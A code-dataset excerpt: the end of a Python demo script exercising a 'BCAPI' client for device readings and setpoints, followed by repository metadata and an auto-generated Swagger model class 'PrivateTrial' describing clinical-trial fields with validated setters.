    print("\t\tReading: ", datetime.datetime.fromtimestamp(sp.timestamp), " - ", sp.value)
print("\tRequesting deletion of created reading again... ")
BCAPI.deleteReading(tenant.uuid, new_re_reading.uuid)
print("\t\tOK.")
print("9. - Access setpoint information")
print("\tRequesting all setpoints...")
setpoints = BCAPI.getSetPointsCollection(tenant.uuid)
print("\t\tOK.")
print("\tFound setpoints: ", len(setpoints[0]))
if len(setpoints[0]) > 0:
    print("\tRequesting single setpoint with UUID...")
    print("\tSetPoint UUID: ", setpoints[0][0].uuid)
    setpoint = BCAPI.getSetPoint(tenant.uuid, setpoints[0][0].uuid)
    print("\t\tOK.")
    print("\tSetPoint UUID: ", setpoint.uuid)
    print("\tSetPoint Value: ", setpoint.value)
    print("\tSetPoint timestamp: ", datetime.datetime.fromtimestamp(setpoint.timestamp))
    print("\tSetPoint created at: ", datetime.datetime.fromtimestamp(setpoint.createdAt))
    print("\tSetPoint updated at: ", datetime.datetime.fromtimestamp(setpoint.updatedAt))
print("10. - Create new setpoint")
currentDateTime = int(datetime.datetime.now().timestamp())
new_setPoint = BCAPI.createSetPoint(tenant.uuid, new_device.uuid, 2345.67, currentDateTime)
print("\t\tOK.")
print("\tRequesting created setpoint information again... ")
new_re_setpoint = BCAPI.getSetPoint(tenant.uuid, new_setPoint.uuid)
print("\t\tOK.")
print("\tSetPoint UUID: ", new_re_setpoint.uuid)
print("\tSetPoint Value: ", new_re_setpoint.value)
print("\tSetPoint timestamp: ", datetime.datetime.fromtimestamp(new_re_setpoint.timestamp))
print("\tSetPoint created at: ", datetime.datetime.fromtimestamp(new_re_setpoint.createdAt))
print("\tSetPoint updated at: ", datetime.datetime.fromtimestamp(new_re_setpoint.updatedAt))
print("\tRequesting paginated device associated setpoints...")
new_device_setpoint = BCAPI.getAssociatedSetPoints(tenant.uuid, new_device.uuid, paging)
print("\t\tOK.")
print("\tFound setpoints: ", len(new_device_setpoint[0]))
for sp in new_device_setpoint[0]:
    print("\t\tSetPoint: ", datetime.datetime.fromtimestamp(sp.timestamp), " - ", sp.value)
print("12. - Deleting created entities")
# // print("\tDeleting created device...")
# // BCAPI.deleteDevice(tenant.uuid, new_device.uuid);
# // print("\t\tOK.")
print("\tDeleting created connector...")
BCAPI.deleteConnector(tenant.uuid, new_connector.uuid)
print("\t\tOK.")
print("\tDeleting created property...")
BCAPI.deleteProperty(tenant.uuid, new_property.uuid)
print("\t\tOK.") | 30.224168 | 178 | 0.735195 | 2,142 | 17,258 | 5.82493 | 0.114846 | 0.047608 | 0.038952 | 0.059469 | 0.626513 | 0.473511 | 0.382303 | 0.301835 | 0.259918 | 0.107558 | 0 | 0.012055 | 0.10117 | 17,258 | 571 | 179 | 30.224168 | 0.79229 | 0.103952 | 0 | 0.207612 | 0 | 0.00346 | 0.337029 | 0.01394 | 0 | 0 | 0 | 0 | 0.00346 | 1 | 0.00346 | false | 0.00346 | 0.00692 | 0 | 0.010381 | 0.740484 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
382e05c1aec0a1e0fafc3e75a778a936b61e0df4 | 51,977 | py | Python | mm_power_sdk_python/models/private_trial.py | MolecularMatch/mm-power-sdk-python | 1fcbcc25c47d7b435e03929cb185eb7f10fb415d | [
"Apache-2.0"
] | null | null | null | mm_power_sdk_python/models/private_trial.py | MolecularMatch/mm-power-sdk-python | 1fcbcc25c47d7b435e03929cb185eb7f10fb415d | [
"Apache-2.0"
] | null | null | null | mm_power_sdk_python/models/private_trial.py | MolecularMatch/mm-power-sdk-python | 1fcbcc25c47d7b435e03929cb185eb7f10fb415d | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
MolecularMatch MMPower
MMPower API # noqa: E501
OpenAPI spec version: 1.0.0
Contact: support@molecularmatch.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class PrivateTrial(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'id': 'str',
'institution_id': 'str',
'institution_study_id': 'str',
'registry_id': 'str',
'visible_to_idn': 'bool',
'brief_title': 'str',
'acronym': 'list[str]',
'official_title': 'str',
'sponsors': 'list[ClinicalTrialSponsors]',
'source': 'str',
'oversight': 'Oversight',
'brief_summary': 'str',
'detailed_description': 'str',
'status': 'str',
'start_date': 'datetime',
'completion_date': 'datetime',
'phase': 'str',
'study_type': 'str',
'has_expanded_access': 'bool',
'expanded_access': 'ExpandedAccess',
'study_design': 'StudyDesign',
'primary_outcome': 'list[Outcome]',
'secondary_outcome': 'list[Outcome]',
'other_outcome': 'list[Outcome]',
'number_of_arms': 'int',
'number_of_groups': 'int',
'enrollment': 'int',
'condition': 'list[str]',
'arm_group': 'list[ArmGroup]',
'intervention': 'list[Intervention]',
'biospec_retention': 'str',
'biospec_descr': 'str',
'eligibility': 'Eligibility',
'overall_official': 'list[Investigator]',
'overall_contact': 'Contact',
'overall_contact_backup': 'Contact',
'location': 'list[Location]',
'location_countries': 'list[str]',
'link': 'str',
'reference': 'list[Reference]',
'verification_date': 'datetime',
'study_first_submitted': 'datetime',
'study_first_posted': 'datetime',
'last_update_posted': 'datetime',
'keyword': 'list[str]',
'responsible_party': 'list[ResponsibleParty]',
'processing_status': 'str',
'test': 'bool'
}
attribute_map = {
'id': 'id',
'institution_id': 'institution_id',
'institution_study_id': 'institution_study_id',
'registry_id': 'registry_id',
'visible_to_idn': 'visible_to_IDN',
'brief_title': 'brief_title',
'acronym': 'acronym',
'official_title': 'official_title',
'sponsors': 'sponsors',
'source': 'source',
'oversight': 'oversight',
'brief_summary': 'brief_summary',
'detailed_description': 'detailed_description',
'status': 'status',
'start_date': 'start_date',
'completion_date': 'completion_date',
'phase': 'phase',
'study_type': 'study_type',
'has_expanded_access': 'has_expanded_access',
'expanded_access': 'expanded_access',
'study_design': 'study_design',
'primary_outcome': 'primary_outcome',
'secondary_outcome': 'secondary_outcome',
'other_outcome': 'other_outcome',
'number_of_arms': 'number_of_arms',
'number_of_groups': 'number_of_groups',
'enrollment': 'enrollment',
'condition': 'condition',
'arm_group': 'arm_group',
'intervention': 'intervention',
'biospec_retention': 'biospec_retention',
'biospec_descr': 'biospec_descr',
'eligibility': 'eligibility',
'overall_official': 'overall_official',
'overall_contact': 'overall_contact',
'overall_contact_backup': 'overall_contact_backup',
'location': 'location',
'location_countries': 'location_countries',
'link': 'link',
'reference': 'reference',
'verification_date': 'verification_date',
'study_first_submitted': 'study_first_submitted',
'study_first_posted': 'study_first_posted',
'last_update_posted': 'last_update_posted',
'keyword': 'keyword',
'responsible_party': 'responsible_party',
'processing_status': 'processing_status',
'test': 'test'
}
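# Illustrative sketch (not part of the generated model): swagger-codegen
# clients typically walk swagger_types/attribute_map to (de)serialize, e.g.
#     def to_dict(self):
#         return {self.attribute_map[attr]: getattr(self, attr)
#                 for attr in self.swagger_types}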
def __init__(self, id=None, institution_id=None, institution_study_id=None, registry_id=None, visible_to_idn=True, brief_title=None, acronym=None, official_title=None, sponsors=None, source=None, oversight=None, brief_summary=None, detailed_description=None, status=None, start_date=None, completion_date=None, phase='N/A', study_type=None, has_expanded_access=None, expanded_access=None, study_design=None, primary_outcome=None, secondary_outcome=None, other_outcome=None, number_of_arms=1, number_of_groups=1, enrollment=None, condition=None, arm_group=None, intervention=None, biospec_retention='None Retained', biospec_descr=None, eligibility=None, overall_official=None, overall_contact=None, overall_contact_backup=None, location=None, location_countries=None, link=None, reference=None, verification_date=None, study_first_submitted=None, study_first_posted=None, last_update_posted=None, keyword=None, responsible_party=None, processing_status='received', test=None): # noqa: E501
"""PrivateTrial - a model defined in Swagger""" # noqa: E501
self._id = None
self._institution_id = None
self._institution_study_id = None
self._registry_id = None
self._visible_to_idn = None
self._brief_title = None
self._acronym = None
self._official_title = None
self._sponsors = None
self._source = None
self._oversight = None
self._brief_summary = None
self._detailed_description = None
self._status = None
self._start_date = None
self._completion_date = None
self._phase = None
self._study_type = None
self._has_expanded_access = None
self._expanded_access = None
self._study_design = None
self._primary_outcome = None
self._secondary_outcome = None
self._other_outcome = None
self._number_of_arms = None
self._number_of_groups = None
self._enrollment = None
self._condition = None
self._arm_group = None
self._intervention = None
self._biospec_retention = None
self._biospec_descr = None
self._eligibility = None
self._overall_official = None
self._overall_contact = None
self._overall_contact_backup = None
self._location = None
self._location_countries = None
self._link = None
self._reference = None
self._verification_date = None
self._study_first_submitted = None
self._study_first_posted = None
self._last_update_posted = None
self._keyword = None
self._responsible_party = None
self._processing_status = None
self._test = None
self.discriminator = None
if id is not None:
self.id = id
self.institution_id = institution_id
self.institution_study_id = institution_study_id
if registry_id is not None:
self.registry_id = registry_id
if visible_to_idn is not None:
self.visible_to_idn = visible_to_idn
if brief_title is not None:
self.brief_title = brief_title
if acronym is not None:
self.acronym = acronym
self.official_title = official_title
if sponsors is not None:
self.sponsors = sponsors
if source is not None:
self.source = source
if oversight is not None:
self.oversight = oversight
if brief_summary is not None:
self.brief_summary = brief_summary
if detailed_description is not None:
self.detailed_description = detailed_description
self.status = status
self.start_date = start_date
if completion_date is not None:
self.completion_date = completion_date
if phase is not None:
self.phase = phase
self.study_type = study_type
if has_expanded_access is not None:
self.has_expanded_access = has_expanded_access
if expanded_access is not None:
self.expanded_access = expanded_access
if study_design is not None:
self.study_design = study_design
if primary_outcome is not None:
self.primary_outcome = primary_outcome
if secondary_outcome is not None:
self.secondary_outcome = secondary_outcome
if other_outcome is not None:
self.other_outcome = other_outcome
if number_of_arms is not None:
self.number_of_arms = number_of_arms
if number_of_groups is not None:
self.number_of_groups = number_of_groups
if enrollment is not None:
self.enrollment = enrollment
if condition is not None:
self.condition = condition
if arm_group is not None:
self.arm_group = arm_group
if intervention is not None:
self.intervention = intervention
if biospec_retention is not None:
self.biospec_retention = biospec_retention
if biospec_descr is not None:
self.biospec_descr = biospec_descr
if eligibility is not None:
self.eligibility = eligibility
if overall_official is not None:
self.overall_official = overall_official
if overall_contact is not None:
self.overall_contact = overall_contact
if overall_contact_backup is not None:
self.overall_contact_backup = overall_contact_backup
self.location = location
if location_countries is not None:
self.location_countries = location_countries
if link is not None:
self.link = link
if reference is not None:
self.reference = reference
if verification_date is not None:
self.verification_date = verification_date
if study_first_submitted is not None:
self.study_first_submitted = study_first_submitted
if study_first_posted is not None:
self.study_first_posted = study_first_posted
if last_update_posted is not None:
self.last_update_posted = last_update_posted
if keyword is not None:
self.keyword = keyword
if responsible_party is not None:
self.responsible_party = responsible_party
if processing_status is not None:
self.processing_status = processing_status
if test is not None:
self.test = test
@property
def id(self):
"""Gets the id of this PrivateTrial. # noqa: E501
unique study identifier. # noqa: E501
:return: The id of this PrivateTrial. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this PrivateTrial.
unique study identifier. # noqa: E501
:param id: The id of this PrivateTrial. # noqa: E501
:type: str
"""
self._id = id
@property
def institution_id(self):
"""Gets the institution_id of this PrivateTrial. # noqa: E501
Unique institution identifier. # noqa: E501
:return: The institution_id of this PrivateTrial. # noqa: E501
:rtype: str
"""
return self._institution_id
@institution_id.setter
def institution_id(self, institution_id):
"""Sets the institution_id of this PrivateTrial.
Unique institution identifier. # noqa: E501
:param institution_id: The institution_id of this PrivateTrial. # noqa: E501
:type: str
"""
if institution_id is None:
raise ValueError("Invalid value for `institution_id`, must not be `None`") # noqa: E501
self._institution_id = institution_id
@property
def institution_study_id(self):
"""Gets the institution_study_id of this PrivateTrial. # noqa: E501
Unique study identifier (for the institution). # noqa: E501
:return: The institution_study_id of this PrivateTrial. # noqa: E501
:rtype: str
"""
return self._institution_study_id
@institution_study_id.setter
def institution_study_id(self, institution_study_id):
"""Sets the institution_study_id of this PrivateTrial.
Unique study identifier (for the institution). # noqa: E501
:param institution_study_id: The institution_study_id of this PrivateTrial. # noqa: E501
:type: str
"""
if institution_study_id is None:
raise ValueError("Invalid value for `institution_study_id`, must not be `None`") # noqa: E501
self._institution_study_id = institution_study_id
@property
def registry_id(self):
"""Gets the registry_id of this PrivateTrial. # noqa: E501
The public registry study id. This is only populated once the trial is no longer a private trial. # noqa: E501
:return: The registry_id of this PrivateTrial. # noqa: E501
:rtype: str
"""
return self._registry_id
@registry_id.setter
def registry_id(self, registry_id):
"""Sets the registry_id of this PrivateTrial.
The public registry study id. This is only populated once the trial is no longer a private trial. # noqa: E501
:param registry_id: The registry_id of this PrivateTrial. # noqa: E501
:type: str
"""
self._registry_id = registry_id
@property
def visible_to_idn(self):
"""Gets the visible_to_idn of this PrivateTrial. # noqa: E501
If true, then this trial will be visible to the entire IDN, else it is visible only to the owning institution. # noqa: E501
:return: The visible_to_idn of this PrivateTrial. # noqa: E501
:rtype: bool
"""
return self._visible_to_idn
@visible_to_idn.setter
def visible_to_idn(self, visible_to_idn):
"""Sets the visible_to_idn of this PrivateTrial.
If true, then this trial will be visible to the entire IDN, else it is visible only to the owning institution. # noqa: E501
:param visible_to_idn: The visible_to_idn of this PrivateTrial. # noqa: E501
:type: bool
"""
self._visible_to_idn = visible_to_idn
@property
def brief_title(self):
"""Gets the brief_title of this PrivateTrial. # noqa: E501
A short title of the clinical study written in language intended for the lay public. The title should include, where possible, information on the participants, condition being evaluated, and intervention(s) studied. # noqa: E501
:return: The brief_title of this PrivateTrial. # noqa: E501
:rtype: str
"""
return self._brief_title
@brief_title.setter
def brief_title(self, brief_title):
"""Sets the brief_title of this PrivateTrial.
A short title of the clinical study written in language intended for the lay public. The title should include, where possible, information on the participants, condition being evaluated, and intervention(s) studied. # noqa: E501
:param brief_title: The brief_title of this PrivateTrial. # noqa: E501
:type: str
"""
self._brief_title = brief_title
@property
def acronym(self):
"""Gets the acronym of this PrivateTrial. # noqa: E501
Acronyms or abbreviations used publicly to identify the clinical study. # noqa: E501
:return: The acronym of this PrivateTrial. # noqa: E501
:rtype: list[str]
"""
return self._acronym
@acronym.setter
def acronym(self, acronym):
"""Sets the acronym of this PrivateTrial.
Acronyms or abbreviations used publicly to identify the clinical study. # noqa: E501
:param acronym: The acronym of this PrivateTrial. # noqa: E501
:type: list[str]
"""
self._acronym = acronym
@property
def official_title(self):
"""Gets the official_title of this PrivateTrial. # noqa: E501
Official title for the clinical trial. # noqa: E501
:return: The official_title of this PrivateTrial. # noqa: E501
:rtype: str
"""
return self._official_title
@official_title.setter
def official_title(self, official_title):
"""Sets the official_title of this PrivateTrial.
Official title for the clinical trial. # noqa: E501
:param official_title: The official_title of this PrivateTrial. # noqa: E501
:type: str
"""
if official_title is None:
raise ValueError("Invalid value for `official_title`, must not be `None`") # noqa: E501
self._official_title = official_title
@property
def sponsors(self):
"""Gets the sponsors of this PrivateTrial. # noqa: E501
The list of organizations or persons who initiated the study and who have authority and control over the study. # noqa: E501
:return: The sponsors of this PrivateTrial. # noqa: E501
:rtype: list[ClinicalTrialSponsors]
"""
return self._sponsors
@sponsors.setter
def sponsors(self, sponsors):
"""Sets the sponsors of this PrivateTrial.
The list of organizations or persons who initiated the study and who have authority and control over the study. # noqa: E501
:param sponsors: The sponsors of this PrivateTrial. # noqa: E501
:type: list[ClinicalTrialSponsors]
"""
self._sponsors = sponsors
@property
def source(self):
"""Gets the source of this PrivateTrial. # noqa: E501
Native data source of this record # noqa: E501
:return: The source of this PrivateTrial. # noqa: E501
:rtype: str
"""
return self._source
@source.setter
def source(self, source):
"""Sets the source of this PrivateTrial.
Native data source of this record # noqa: E501
:param source: The source of this PrivateTrial. # noqa: E501
:type: str
"""
self._source = source
@property
def oversight(self):
"""Gets the oversight of this PrivateTrial. # noqa: E501
:return: The oversight of this PrivateTrial. # noqa: E501
:rtype: Oversight
"""
return self._oversight
@oversight.setter
def oversight(self, oversight):
"""Sets the oversight of this PrivateTrial.
:param oversight: The oversight of this PrivateTrial. # noqa: E501
:type: Oversight
"""
self._oversight = oversight
@property
def brief_summary(self):
"""Gets the brief_summary of this PrivateTrial. # noqa: E501
A short description of the clinical study, including a brief statement of the clinical study's hypothesis, written in language intended for the lay public. # noqa: E501
:return: The brief_summary of this PrivateTrial. # noqa: E501
:rtype: str
"""
return self._brief_summary
@brief_summary.setter
def brief_summary(self, brief_summary):
"""Sets the brief_summary of this PrivateTrial.
A short description of the clinical study, including a brief statement of the clinical study's hypothesis, written in language intended for the lay public. # noqa: E501
:param brief_summary: The brief_summary of this PrivateTrial. # noqa: E501
:type: str
"""
self._brief_summary = brief_summary
@property
def detailed_description(self):
"""Gets the detailed_description of this PrivateTrial. # noqa: E501
Extended description of the protocol, including more technical information (as compared to the Brief Summary), if desired. Do not include the entire protocol; do not duplicate information recorded in other data elements, such as Eligibility Criteria or outcome measures. # noqa: E501
:return: The detailed_description of this PrivateTrial. # noqa: E501
:rtype: str
"""
return self._detailed_description
@detailed_description.setter
def detailed_description(self, detailed_description):
"""Sets the detailed_description of this PrivateTrial.
Extended description of the protocol, including more technical information (as compared to the Brief Summary), if desired. Do not include the entire protocol; do not duplicate information recorded in other data elements, such as Eligibility Criteria or outcome measures. # noqa: E501
:param detailed_description: The detailed_description of this PrivateTrial. # noqa: E501
:type: str
"""
self._detailed_description = detailed_description
@property
def status(self):
"""Gets the status of this PrivateTrial. # noqa: E501
Trial recruiting status. # noqa: E501
:return: The status of this PrivateTrial. # noqa: E501
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this PrivateTrial.
Trial recruiting status. # noqa: E501
:param status: The status of this PrivateTrial. # noqa: E501
:type: str
"""
if status is None:
raise ValueError("Invalid value for `status`, must not be `None`") # noqa: E501
allowed_values = ["Active, not recruiting", "Approved for marketing", "Available", "Completed", "Enrolling by invitation", "No longer available", "Not yet recruiting", "Recruiting", "Suspended", "Temporarily not available", "Terminated", "Withdrawn", "Withheld", "Unknown status"] # noqa: E501
if status not in allowed_values:
raise ValueError(
"Invalid value for `status` ({0}), must be one of {1}" # noqa: E501
.format(status, allowed_values)
)
self._status = status
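# Example (sketch): assignments outside allowed_values raise, e.g.
#     trial.status = "Paused"       # ValueError: Invalid value for `status` ...
#     trial.status = "Recruiting"   # accepted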
@property
def start_date(self):
"""Gets the start_date of this PrivateTrial. # noqa: E501
The estimated date on which the clinical study will be open for recruitment of participants, or the actual date on which the first participant was enrolled. # noqa: E501
:return: The start_date of this PrivateTrial. # noqa: E501
:rtype: datetime
"""
return self._start_date
@start_date.setter
def start_date(self, start_date):
"""Sets the start_date of this PrivateTrial.
The estimated date on which the clinical study will be open for recruitment of participants, or the actual date on which the first participant was enrolled. # noqa: E501
:param start_date: The start_date of this PrivateTrial. # noqa: E501
:type: datetime
"""
if start_date is None:
raise ValueError("Invalid value for `start_date`, must not be `None`") # noqa: E501
self._start_date = start_date
@property
def completion_date(self):
"""Gets the completion_date of this PrivateTrial. # noqa: E501
The date the final participant was examined or received an intervention for purposes of final collection of data for the primary and secondary outcome measures and adverse events (for example, last participant’s last visit), whether the clinical study concluded according to the pre-specified protocol or was terminated # noqa: E501
:return: The completion_date of this PrivateTrial. # noqa: E501
:rtype: datetime
"""
return self._completion_date
@completion_date.setter
def completion_date(self, completion_date):
"""Sets the completion_date of this PrivateTrial.
The date the final participant was examined or received an intervention for purposes of final collection of data for the primary and secondary outcome measures and adverse events (for example, last participant’s last visit), whether the clinical study concluded according to the pre-specified protocol or was terminated # noqa: E501
:param completion_date: The completion_date of this PrivateTrial. # noqa: E501
:type: datetime
"""
self._completion_date = completion_date
@property
def phase(self):
"""Gets the phase of this PrivateTrial. # noqa: E501
For a clinical trial of a drug product (including a biological product), the numerical phase of such clinical trial, consistent with terminology in 21 CFR 312.21 and in 21 CFR 312.85 for phase 4 studies. # noqa: E501
:return: The phase of this PrivateTrial. # noqa: E501
:rtype: str
"""
return self._phase
@phase.setter
def phase(self, phase):
"""Sets the phase of this PrivateTrial.
For a clinical trial of a drug product (including a biological product), the numerical phase of such clinical trial, consistent with terminology in 21 CFR 312.21 and in 21 CFR 312.85 for phase 4 studies. # noqa: E501
:param phase: The phase of this PrivateTrial. # noqa: E501
:type: str
"""
allowed_values = ["N/A", "Early Phase 1", "Phase 1", "Phase 1/Phase 2", "Phase 2", "Phase 2/Phase 3", "Phase 3", "Phase 4"] # noqa: E501
if phase not in allowed_values:
raise ValueError(
"Invalid value for `phase` ({0}), must be one of {1}" # noqa: E501
.format(phase, allowed_values)
)
self._phase = phase
@property
def study_type(self):
"""Gets the study_type of this PrivateTrial. # noqa: E501
The nature of the investigation or investigational use for which clinical study information is being submitted. # noqa: E501
:return: The study_type of this PrivateTrial. # noqa: E501
:rtype: str
"""
return self._study_type
@study_type.setter
def study_type(self, study_type):
"""Sets the study_type of this PrivateTrial.
The nature of the investigation or investigational use for which clinical study information is being submitted. # noqa: E501
:param study_type: The study_type of this PrivateTrial. # noqa: E501
:type: str
"""
if study_type is None:
raise ValueError("Invalid value for `study_type`, must not be `None`") # noqa: E501
allowed_values = ["Expanded Access", "Interventional", "N/A", "Observational", "Observational [Patient Registry]"] # noqa: E501
if study_type not in allowed_values:
raise ValueError(
"Invalid value for `study_type` ({0}), must be one of {1}" # noqa: E501
.format(study_type, allowed_values)
)
self._study_type = study_type
@property
def has_expanded_access(self):
"""Gets the has_expanded_access of this PrivateTrial. # noqa: E501
Whether there is expanded access to the investigational product for patients who do not qualify for enrollment in a clinical trial. Expanded Access for investigational drug products (including biological products) includes all expanded access types under section 561 of the Federal Food, Drug, and Cosmetic Act: (1) for individual participants, including emergency use; (2) for intermediate-size participant populations; and (3) under a treatment IND or treatment protocol. # noqa: E501
:return: The has_expanded_access of this PrivateTrial. # noqa: E501
:rtype: bool
"""
return self._has_expanded_access
@has_expanded_access.setter
def has_expanded_access(self, has_expanded_access):
"""Sets the has_expanded_access of this PrivateTrial.
Whether there is expanded access to the investigational product for patients who do not qualify for enrollment in a clinical trial. Expanded Access for investigational drug products (including biological products) includes all expanded access types under section 561 of the Federal Food, Drug, and Cosmetic Act: (1) for individual participants, including emergency use; (2) for intermediate-size participant populations; and (3) under a treatment IND or treatment protocol. # noqa: E501
:param has_expanded_access: The has_expanded_access of this PrivateTrial. # noqa: E501
:type: bool
"""
self._has_expanded_access = has_expanded_access
@property
def expanded_access(self):
"""Gets the expanded_access of this PrivateTrial. # noqa: E501
:return: The expanded_access of this PrivateTrial. # noqa: E501
:rtype: ExpandedAccess
"""
return self._expanded_access
@expanded_access.setter
def expanded_access(self, expanded_access):
"""Sets the expanded_access of this PrivateTrial.
:param expanded_access: The expanded_access of this PrivateTrial. # noqa: E501
:type: ExpandedAccess
"""
self._expanded_access = expanded_access
@property
def study_design(self):
"""Gets the study_design of this PrivateTrial. # noqa: E501
:return: The study_design of this PrivateTrial. # noqa: E501
:rtype: StudyDesign
"""
return self._study_design
@study_design.setter
def study_design(self, study_design):
"""Sets the study_design of this PrivateTrial.
:param study_design: The study_design of this PrivateTrial. # noqa: E501
:type: StudyDesign
"""
self._study_design = study_design
@property
def primary_outcome(self):
"""Gets the primary_outcome of this PrivateTrial. # noqa: E501
The outcome that an investigator considers to be the most important among the many outcomes that are to be examined in the study. # noqa: E501
:return: The primary_outcome of this PrivateTrial. # noqa: E501
:rtype: list[Outcome]
"""
return self._primary_outcome
@primary_outcome.setter
def primary_outcome(self, primary_outcome):
"""Sets the primary_outcome of this PrivateTrial.
The outcome that an investigator considers to be the most important among the many outcomes that are to be examined in the study. # noqa: E501
:param primary_outcome: The primary_outcome of this PrivateTrial. # noqa: E501
:type: list[Outcome]
"""
self._primary_outcome = primary_outcome
@property
def secondary_outcome(self):
"""Gets the secondary_outcome of this PrivateTrial. # noqa: E501
:return: The secondary_outcome of this PrivateTrial. # noqa: E501
:rtype: list[Outcome]
"""
return self._secondary_outcome
@secondary_outcome.setter
def secondary_outcome(self, secondary_outcome):
"""Sets the secondary_outcome of this PrivateTrial.
:param secondary_outcome: The secondary_outcome of this PrivateTrial. # noqa: E501
:type: list[Outcome]
"""
self._secondary_outcome = secondary_outcome
@property
def other_outcome(self):
"""Gets the other_outcome of this PrivateTrial. # noqa: E501
:return: The other_outcome of this PrivateTrial. # noqa: E501
:rtype: list[Outcome]
"""
return self._other_outcome
@other_outcome.setter
def other_outcome(self, other_outcome):
"""Sets the other_outcome of this PrivateTrial.
:param other_outcome: The other_outcome of this PrivateTrial. # noqa: E501
:type: list[Outcome]
"""
self._other_outcome = other_outcome
@property
def number_of_arms(self):
"""Gets the number_of_arms of this PrivateTrial. # noqa: E501
The number of trial arms. # noqa: E501
:return: The number_of_arms of this PrivateTrial. # noqa: E501
:rtype: int
"""
return self._number_of_arms
@number_of_arms.setter
def number_of_arms(self, number_of_arms):
"""Sets the number_of_arms of this PrivateTrial.
The number of trial arms. # noqa: E501
:param number_of_arms: The number_of_arms of this PrivateTrial. # noqa: E501
:type: int
"""
self._number_of_arms = number_of_arms
@property
def number_of_groups(self):
"""Gets the number_of_groups of this PrivateTrial. # noqa: E501
The number of trial groups. # noqa: E501
:return: The number_of_groups of this PrivateTrial. # noqa: E501
:rtype: int
"""
return self._number_of_groups
@number_of_groups.setter
def number_of_groups(self, number_of_groups):
"""Sets the number_of_groups of this PrivateTrial.
The number of trial groups. # noqa: E501
:param number_of_groups: The number_of_groups of this PrivateTrial. # noqa: E501
:type: int
"""
self._number_of_groups = number_of_groups
@property
def enrollment(self):
"""Gets the enrollment of this PrivateTrial. # noqa: E501
The estimated total number of participants to be enrolled (target number) or the actual total number of participants that are enrolled in the clinical study. # noqa: E501
:return: The enrollment of this PrivateTrial. # noqa: E501
:rtype: int
"""
return self._enrollment
@enrollment.setter
def enrollment(self, enrollment):
"""Sets the enrollment of this PrivateTrial.
The estimated total number of participants to be enrolled (target number) or the actual total number of participants that are enrolled in the clinical study. # noqa: E501
:param enrollment: The enrollment of this PrivateTrial. # noqa: E501
:type: int
"""
self._enrollment = enrollment
@property
def condition(self):
"""Gets the condition of this PrivateTrial. # noqa: E501
Diseases/Conditions related to this trial. # noqa: E501
:return: The condition of this PrivateTrial. # noqa: E501
:rtype: list[str]
"""
return self._condition
@condition.setter
def condition(self, condition):
"""Sets the condition of this PrivateTrial.
Diseases/Conditions related to this trial. # noqa: E501
:param condition: The condition of this PrivateTrial. # noqa: E501
:type: list[str]
"""
self._condition = condition
@property
def arm_group(self):
"""Gets the arm_group of this PrivateTrial. # noqa: E501
Pre-specified groups of participants in a clinical trial assigned to receive specific interventions (or no intervention) according to a protocol. # noqa: E501
:return: The arm_group of this PrivateTrial. # noqa: E501
:rtype: list[ArmGroup]
"""
return self._arm_group
@arm_group.setter
def arm_group(self, arm_group):
"""Sets the arm_group of this PrivateTrial.
Pre-specified groups of participants in a clinical trial assigned to receive specific interventions (or no intervention) according to a protocol. # noqa: E501
:param arm_group: The arm_group of this PrivateTrial. # noqa: E501
:type: list[ArmGroup]
"""
self._arm_group = arm_group
@property
def intervention(self):
"""Gets the intervention of this PrivateTrial. # noqa: E501
Specifies the intervention(s) associated with each arm or group. # noqa: E501
:return: The intervention of this PrivateTrial. # noqa: E501
:rtype: list[Intervention]
"""
return self._intervention
@intervention.setter
def intervention(self, intervention):
"""Sets the intervention of this PrivateTrial.
Specifies the intervention(s) associated with each arm or group. # noqa: E501
:param intervention: The intervention of this PrivateTrial. # noqa: E501
:type: list[Intervention]
"""
self._intervention = intervention
@property
def biospec_retention(self):
"""Gets the biospec_retention of this PrivateTrial. # noqa: E501
:return: The biospec_retention of this PrivateTrial. # noqa: E501
:rtype: str
"""
return self._biospec_retention
@biospec_retention.setter
def biospec_retention(self, biospec_retention):
"""Sets the biospec_retention of this PrivateTrial.
:param biospec_retention: The biospec_retention of this PrivateTrial. # noqa: E501
:type: str
"""
allowed_values = ["None Retained", "Samples With DNA", "Samples Without DNA"] # noqa: E501
if biospec_retention not in allowed_values:
raise ValueError(
"Invalid value for `biospec_retention` ({0}), must be one of {1}" # noqa: E501
.format(biospec_retention, allowed_values)
)
self._biospec_retention = biospec_retention
@property
def biospec_descr(self):
"""Gets the biospec_descr of this PrivateTrial. # noqa: E501
:return: The biospec_descr of this PrivateTrial. # noqa: E501
:rtype: str
"""
return self._biospec_descr
@biospec_descr.setter
def biospec_descr(self, biospec_descr):
"""Sets the biospec_descr of this PrivateTrial.
:param biospec_descr: The biospec_descr of this PrivateTrial. # noqa: E501
:type: str
"""
self._biospec_descr = biospec_descr
@property
def eligibility(self):
"""Gets the eligibility of this PrivateTrial. # noqa: E501
:return: The eligibility of this PrivateTrial. # noqa: E501
:rtype: Eligibility
"""
return self._eligibility
@eligibility.setter
def eligibility(self, eligibility):
"""Sets the eligibility of this PrivateTrial.
:param eligibility: The eligibility of this PrivateTrial. # noqa: E501
:type: Eligibility
"""
self._eligibility = eligibility
@property
def overall_official(self):
"""Gets the overall_official of this PrivateTrial. # noqa: E501
Person responsible for the overall scientific leadership of the protocol, including study principal investigator. # noqa: E501
:return: The overall_official of this PrivateTrial. # noqa: E501
:rtype: list[Investigator]
"""
return self._overall_official
@overall_official.setter
def overall_official(self, overall_official):
"""Sets the overall_official of this PrivateTrial.
Person responsible for the overall scientific leadership of the protocol, including study principal investigator. # noqa: E501
:param overall_official: The overall_official of this PrivateTrial. # noqa: E501
:type: list[Investigator]
"""
self._overall_official = overall_official
@property
def overall_contact(self):
"""Gets the overall_contact of this PrivateTrial. # noqa: E501
:return: The overall_contact of this PrivateTrial. # noqa: E501
:rtype: Contact
"""
